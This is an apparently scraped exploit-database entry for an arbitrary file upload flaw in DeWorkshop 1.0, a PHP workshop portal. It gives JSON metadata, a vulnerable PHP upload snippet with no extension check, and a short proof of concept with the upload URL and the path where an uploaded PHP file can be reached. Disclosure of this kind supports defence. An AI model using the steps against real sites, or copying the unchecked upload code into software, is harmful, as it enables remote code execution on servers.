DeWorkshop 1.0 - Arbitrary File Upload Vulnerability

2017-08-19T00:00:00

Description

Exploit for php platform in category web applications

{"id": "1337DAY-ID-28317", "type": "zdt", "bulletinFamily": "exploit", "title": "DeWorkshop 1.0 - Arbitrary File Upload Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2017-08-19T00:00:00", "modified": "2017-08-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/28317", "reporter": "Ihsan Sencan", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-01T15:07:58", "viewCount": 7, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "threatpost", "idList": ["THREATPOST:5D5241707AB76ED799696E37D048872A", "THREATPOST:7876640D5EC3E8FE3FE885606BBB1C6D"]}]}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://0day.today/exploit/28317", "sourceData": "# # # # #\r\n# Exploit Title: DeWorkshop 1.0 - Arbitrary File Upload\r\n# Dork: N/A\r\n# Date: 18.08.2017\r\n# Vendor Homepage : https://sarutech.com/\r\n# Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737\r\n# Demo: https://demo.sarutech.com/deworkshop/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands and upload arbitrary file....\r\n#\r\n# Vulnerable Source:\r\n# .....................\r\n# $eid = $_GET[\"id\"];\r\n# ......\r\n# $folder = \"img/users/\";\r\n# $extention = strrchr($_FILES['bgimg']['name'], \".\");\r\n# $bgimg = $_FILES['bgimg']['name'];\r\n# //$bgimg = $new_name.'.jpg';\r\n# $uploaddir = $folder . $bgimg;\r\n# move_uploaded_file($_FILES['bgimg']['tmp_name'], $uploaddir);\r\n# .....................\r\n# \r\n# Proof of Concept:\r\n# \r\n# Customer profile picture arbitrary file can be uploaded ..\r\n# \r\n# http://localhost/[PATH]/customerupdate.php?id=1\r\n# http://localhost/[PATH]/img/users/[FILE].php\r\n# \r\n#####\n\n# 0day.today [2018-01-01] #", "_state": {"dependencies": 1647589307, "score": 1659709850, "epss": 1678852985}}